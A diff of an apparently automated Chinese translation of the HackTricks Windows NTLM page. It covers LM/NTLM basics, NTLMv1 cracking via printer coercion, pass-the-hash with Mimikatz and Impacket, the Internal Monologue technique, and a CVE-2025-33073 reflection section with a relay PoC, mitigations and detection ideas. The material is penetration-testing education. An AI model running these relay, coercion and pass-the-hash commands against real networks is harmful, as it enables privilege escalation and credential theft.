Translated ['src/windows-hardening/ntlm/README.md'] to zh

src/windows-hardening/ntlm/README.md

@@ -2,70 +2,25 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## NTLM & Kerberos *Reflection* via Serialized SPNs (CVE-2025-33073)
 
-Windows包含几种缓解措施，试图防止*反射*攻击，其中来自主机的NTLM（或Kerberos）身份验证被重新传递回**同一**主机以获取SYSTEM权限。
+## 基本信息
 
-微软通过MS08-068（SMB→SMB）、MS09-013（HTTP→SMB）、MS15-076（DCOM→DCOM）及后续补丁破坏了大多数公共链，然而**CVE-2025-33073**显示保护仍然可以通过滥用**SMB客户端截断包含*序列化*（serialized）目标信息的服务主体名称（SPNs）**来绕过。
+在运行 **Windows XP 和 Server 2003** 的环境中，使用 LM (Lan Manager) 哈希，尽管广泛认为这些哈希容易被攻破。一个特定的 LM 哈希 `AAD3B435B51404EEAAD3B435B51404EE` 表示未使用 LM，代表一个空字符串的哈希。
 
-### TL;DR of the bug
-1. 攻击者注册一个**DNS A记录**，其标签编码一个序列化的SPN – 例如
-`srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA → 10.10.10.50`
-2. 受害者被迫对该主机名进行身份验证（PetitPotam, DFSCoerce等）。
-3. 当SMB客户端将目标字符串`cifs/srv11UWhRCAAAAA…`传递给`lsasrv!LsapCheckMarshalledTargetInfo`时，对`CredUnmarshalTargetInfo`的调用**去掉**了序列化的blob，留下**`cifs/srv1`**。
-4. `msv1_0!SspIsTargetLocalhost`（或Kerberos等效项）现在将目标视为*localhost*，因为短主机部分与计算机名称（`SRV1`）匹配。
-5. 因此，服务器设置`NTLMSSP_NEGOTIATE_LOCAL_CALL`并将**LSASS的SYSTEM访问令牌**注入上下文中（对于Kerberos，创建一个标记为SYSTEM的子会话密钥）。
-6. 使用`ntlmrelayx.py`**或**`krbrelayx.py`中继该身份验证可在同一主机上获得完全的SYSTEM权限。
+默认情况下，**Kerberos** 认证协议是主要使用的方法。NTLM (NT LAN Manager) 在特定情况下介入：缺少 Active Directory、域不存在、由于配置不当导致 Kerberos 故障，或在尝试使用 IP 地址而非有效主机名进行连接时。
 
-### Quick PoC
-```bash
-# Add malicious DNS record
-dnstool.py -u 'DOMAIN\\user' -p 'pass' 10.10.10.1 \
--a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA \
--d 10.10.10.50
-
-# Trigger authentication
-PetitPotam.py -u user -p pass -d DOMAIN \
-srv11UWhRCAAAAAAAAAAAAAAAAA… TARGET.DOMAIN.LOCAL
-
-# Relay listener (NTLM)
-ntlmrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support
-
-# Relay listener (Kerberos) – remove NTLM mechType first
-krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support
-```
-### Patch & Mitigations
-* KB patch for **CVE-2025-33073** 在 `mrxsmb.sys::SmbCeCreateSrvCall` 中添加了检查，阻止任何目标包含序列化信息的 SMB 连接（`CredUnmarshalTargetInfo` ≠ `STATUS_INVALID_PARAMETER`）。
-* 强制 **SMB 签名** 以防止即使在未打补丁的主机上也发生反射。
-* 监控类似 `*<base64>...*` 的 DNS 记录并阻止强制向量（PetitPotam, DFSCoerce, AuthIP...）。
-
-### Detection ideas
-* 网络捕获中包含 `NTLMSSP_NEGOTIATE_LOCAL_CALL`，其中客户端 IP ≠ 服务器 IP。
-* 包含子会话密钥和客户端主体等于主机名的 Kerberos AP-REQ。
-* Windows 事件 4624/4648 系统登录后立即跟随来自同一主机的远程 SMB 写入。
-
-## References
-* [Synacktiv – NTLM Reflection is Dead, Long Live NTLM Reflection!](https://www.synacktiv.com/en/publications/la-reflexion-ntlm-est-morte-vive-la-reflexion-ntlm-analyse-approfondie-de-la-cve-2025.html)
-* [MSRC – CVE-2025-33073](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073)
-
-## Basic Information
-
-在 **Windows XP 和 Server 2003** 操作的环境中，使用 LM（Lan Manager）哈希，尽管广泛认为这些哈希容易被破解。特定的 LM 哈希 `AAD3B435B51404EEAAD3B435B51404EE` 表示未使用 LM，代表空字符串的哈希。
-
-默认情况下，**Kerberos** 认证协议是主要使用的方法。NTLM（NT LAN Manager）在特定情况下介入：缺少 Active Directory、域不存在、Kerberos 由于配置不当而故障，或当尝试使用 IP 地址而不是有效主机名进行连接时。
-
-网络数据包中存在 **"NTLMSSP"** 头部信号着 NTLM 认证过程。
+网络数据包中存在 **"NTLMSSP"** 头部信号表示 NTLM 认证过程。
 
 对认证协议 - LM、NTLMv1 和 NTLMv2 - 的支持由位于 `%windir%\Windows\System32\msv1\_0.dll` 的特定 DLL 提供。
 
-**Key Points**:
+**要点**：
 
-- LM 哈希是脆弱的，空 LM 哈希（`AAD3B435B51404EEAAD3B435B51404EE`）表示未使用。
+- LM 哈希易受攻击，空 LM 哈希 (`AAD3B435B51404EEAAD3B435B51404EE`) 表示未使用。
 - Kerberos 是默认的认证方法，NTLM 仅在特定条件下使用。
 - NTLM 认证数据包可通过 "NTLMSSP" 头部识别。
 - LM、NTLMv1 和 NTLMv2 协议由系统文件 `msv1\_0.dll` 支持。
 
-## LM, NTLMv1 and NTLMv2
+## LM、NTLMv1 和 NTLMv2
 
 您可以检查和配置将使用哪个协议：
 
@@ -75,9 +30,9 @@ krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support
 
 ![](<../../images/image (919).png>)
 
-### Registry
+### 注册表
 
-这将设置级别 5:
+这将设置级别 5：
 ```
 reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f
 ```
@@ -124,8 +79,8 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t RE
 如今，发现配置了不受限制的委派的环境变得越来越少，但这并不意味着您不能**滥用配置的打印后台处理程序服务**。
 
 您可以滥用您在 AD 上已经拥有的一些凭据/会话，**请求打印机对某个**您控制的**主机进行身份验证**。然后，使用 `metasploit auxiliary/server/capture/smb` 或 `responder`，您可以**将认证挑战设置为 1122334455667788**，捕获认证尝试，如果使用的是**NTLMv1**，您将能够**破解它**。\
-如果您使用 `responder`，可以尝试**使用标志 `--lm`**来尝试**降级**认证。\
-_请注意，对于此技术，身份验证必须使用 NTLMv1（NTLMv2 无效）进行。_
+如果您使用 `responder`，可以尝试**使用标志 `--lm`** 来尝试**降级**认证。\
+_请注意，对于此技术，身份验证必须使用 NTLMv1 进行（NTLMv2 无效）。_
 
 请记住，打印机在身份验证期间将使用计算机帐户，而计算机帐户使用**长且随机的密码**，您**可能无法使用常见的**字典**破解**。但是，**NTLMv1** 认证**使用 DES**（[更多信息在这里](#ntlmv1-challenge)），因此使用一些专门用于破解 DES 的服务，您将能够破解它（例如，您可以使用 [https://crack.sh/](https://crack.sh) 或 [https://ntlmv1.com/](https://ntlmv1.com)）。
 
@@ -195,7 +150,7 @@ bd760f388b6700 # this is part 2
 
 586c # this is the last part
 ```
-请提供需要翻译的具体内容。
+请提供需要翻译的内容。
 ```bash
 NTHASH=b4b9b02e6f09a9bd760f388b6700586c
 ```
@@ -203,7 +158,7 @@ NTHASH=b4b9b02e6f09a9bd760f388b6700586c
 
 **挑战长度为 8 字节**，并且**发送 2 个响应**：一个是**24 字节**长，另一个的长度是**可变**的。
 
-**第一个响应**是通过使用**HMAC_MD5**对由**客户端和域**组成的**字符串**进行加密生成的，并使用**NT 哈希**的**MD4 哈希**作为**密钥**。然后，**结果**将用作**密钥**，通过**HMAC_MD5**对**挑战**进行加密。为此，将**添加一个 8 字节的客户端挑战**。总计：24 B。
+**第一个响应**是通过使用**HMAC_MD5**对由**客户端和域**组成的**字符串**进行加密生成的，并使用**NT hash**的**MD4 哈希**作为**密钥**。然后，**结果**将用作**密钥**，通过**HMAC_MD5**对**挑战**进行加密。为此，将**添加一个 8 字节的客户端挑战**。总计：24 B。
 
 **第二个响应**是使用**多个值**（一个新的客户端挑战，一个**时间戳**以避免**重放攻击**等）生成的。
 
@@ -231,7 +186,7 @@ Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm
 
 ### Impacket Windows编译工具
 
-您可以在此处下载[impacket Windows二进制文件](https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries)。
+您可以在此处下载[ impacket Windows二进制文件](https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries)。
 
 - **psexec_windows.exe** `C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local`
 - **wmiexec.exe** `wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local`
@@ -288,20 +243,20 @@ wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
 
 内部独白攻击是一种隐秘的凭据提取技术，允许攻击者从受害者的机器中检索NTLM哈希值，**而无需直接与LSASS进程交互**。与Mimikatz不同，后者直接从内存中读取哈希值，且常常被终端安全解决方案或凭据保护阻止，此攻击利用**通过安全支持提供程序接口（SSPI）对NTLM认证包（MSV1_0）的本地调用**。攻击者首先**降级NTLM设置**（例如，LMCompatibilityLevel、NTLMMinClientSec、RestrictSendingNTLMTraffic），以确保允许NetNTLMv1。然后，他们伪装成从运行进程中获取的现有用户令牌，并在本地触发NTLM认证，以使用已知挑战生成NetNTLMv1响应。
 
-在捕获这些NetNTLMv1响应后，攻击者可以快速使用**预计算的彩虹表**恢复原始NTLM哈希，从而启用进一步的Pass-the-Hash攻击以进行横向移动。至关重要的是，内部独白攻击保持隐秘，因为它不会生成网络流量、注入代码或触发直接内存转储，使其比传统方法（如Mimikatz）更难被防御者检测。
+在捕获这些NetNTLMv1响应后，攻击者可以快速使用**预计算的彩虹表**恢复原始NTLM哈希值，从而启用进一步的Pass-the-Hash攻击以进行横向移动。至关重要的是，内部独白攻击保持隐秘，因为它不会生成网络流量、注入代码或触发直接内存转储，使其比传统方法（如Mimikatz）更难被防御者检测。
 
 如果NetNTLMv1未被接受——由于强制的安全策略，攻击者可能无法检索到NetNTLMv1响应。
 
-为处理这种情况，内部独白工具进行了更新：它动态获取服务器令牌，使用`AcceptSecurityContext()`仍然**捕获NetNTLMv2响应**，如果NetNTLMv1失败。虽然NetNTLMv2更难破解，但在有限情况下，它仍然为中继攻击或离线暴力破解打开了一条路径。
+为处理这种情况，内部独白工具进行了更新：它动态获取服务器令牌，使用`AcceptSecurityContext()`以在NetNTLMv1失败时仍然**捕获NetNTLMv2响应**。虽然NetNTLMv2更难破解，但在有限情况下，它仍然为中继攻击或离线暴力破解打开了一条路径。
 
 PoC可以在**[https://github.com/eladshamir/Internal-Monologue](https://github.com/eladshamir/Internal-Monologue)**找到。
 
 ## NTLM中继和响应者
 
-**在这里阅读有关如何执行这些攻击的详细指南：**
+**在这里阅读有关如何执行这些攻击的更详细指南：**
 
 {{#ref}}
-../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
+../../generic-methodologies-and-resources/pentesting-network/`spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md`
 {{#endref}}
 
 ## 从网络捕获中解析NTLM挑战
@@ -312,16 +267,16 @@ PoC可以在**[https://github.com/eladshamir/Internal-Monologue](https://github.
 
 Windows包含几种缓解措施，试图防止*反射*攻击，其中来自主机的NTLM（或Kerberos）认证被中继回**同一**主机以获取SYSTEM权限。
 
-微软通过MS08-068（SMB→SMB）、MS09-013（HTTP→SMB）、MS15-076（DCOM→DCOM）及后续补丁破坏了大多数公共链，然而**CVE-2025-33073**显示，保护措施仍然可以通过滥用**SMB客户端截断服务主体名称（SPN）**来绕过，这些名称包含*序列化*的目标信息。
+微软通过MS08-068（SMB→SMB）、MS09-013（HTTP→SMB）、MS15-076（DCOM→DCOM）及后续补丁破坏了大多数公共链，然而**CVE-2025-33073**显示，保护措施仍然可以通过滥用**SMB客户端截断包含*序列化*（序列化）目标信息的服务主体名称（SPN）**来绕过。
 
 ### 漏洞的简要说明
-1. 攻击者注册一个**DNS A记录**，其标签编码了一个序列化的SPN – 例如
+1. 攻击者注册一个**DNS A记录**，其标签编码一个序列化的SPN – 例如
 `srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA → 10.10.10.50`
 2. 受害者被迫对该主机名进行身份验证（PetitPotam、DFSCoerce等）。
 3. 当SMB客户端将目标字符串`cifs/srv11UWhRCAAAAA…`传递给`lsasrv!LsapCheckMarshalledTargetInfo`时，对`CredUnmarshalTargetInfo`的调用**剥离**了序列化的blob，留下**`cifs/srv1`**。
 4. `msv1_0!SspIsTargetLocalhost`（或Kerberos等效项）现在将目标视为*localhost*，因为短主机部分与计算机名称（`SRV1`）匹配。
 5. 因此，服务器设置`NTLMSSP_NEGOTIATE_LOCAL_CALL`并将**LSASS的SYSTEM访问令牌**注入上下文中（对于Kerberos，创建一个标记为SYSTEM的子会话密钥）。
-6. 使用`ntlmrelayx.py` **或** `krbrelayx.py`中继该身份验证可在同一主机上获得完全的SYSTEM权限。
+6. 使用`ntlmrelayx.py`**或**`krbrelayx.py`中继该认证可在同一主机上获得完全的SYSTEM权限。
 
 ### 快速PoC
 ```bash
@@ -341,13 +296,13 @@ ntlmrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support
 krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support
 ```
 ### 修补与缓解措施
-* **CVE-2025-33073** 的 KB 补丁在 `mrxsmb.sys::SmbCeCreateSrvCall` 中添加了检查，阻止任何目标包含序列化信息的 SMB 连接（`CredUnmarshalTargetInfo` ≠ `STATUS_INVALID_PARAMETER`）。
-* 强制 **SMB 签名** 以防止即使在未修补的主机上也发生反射。
+* 针对 **CVE-2025-33073** 的 KB 补丁在 `mrxsmb.sys::SmbCeCreateSrvCall` 中添加了检查，阻止任何目标包含序列化信息的 SMB 连接（`CredUnmarshalTargetInfo` ≠ `STATUS_INVALID_PARAMETER`）。
+* 强制 **SMB 签名** 以防止即使在未打补丁的主机上也发生反射。
 * 监控类似 `*<base64>...*` 的 DNS 记录并阻止强制向量（PetitPotam, DFSCoerce, AuthIP...）。
 
 ### 检测思路
 * 网络捕获中包含 `NTLMSSP_NEGOTIATE_LOCAL_CALL`，其中客户端 IP ≠ 服务器 IP。
-* 包含子会话密钥和客户端主体等于主机名的 Kerberos AP-REQ。
+* 包含子会话密钥和与主机名相等的客户端主体的 Kerberos AP-REQ。
 * Windows 事件 4624/4648 系统登录后立即跟随来自同一主机的远程 SMB 写入。
 
 ## 参考文献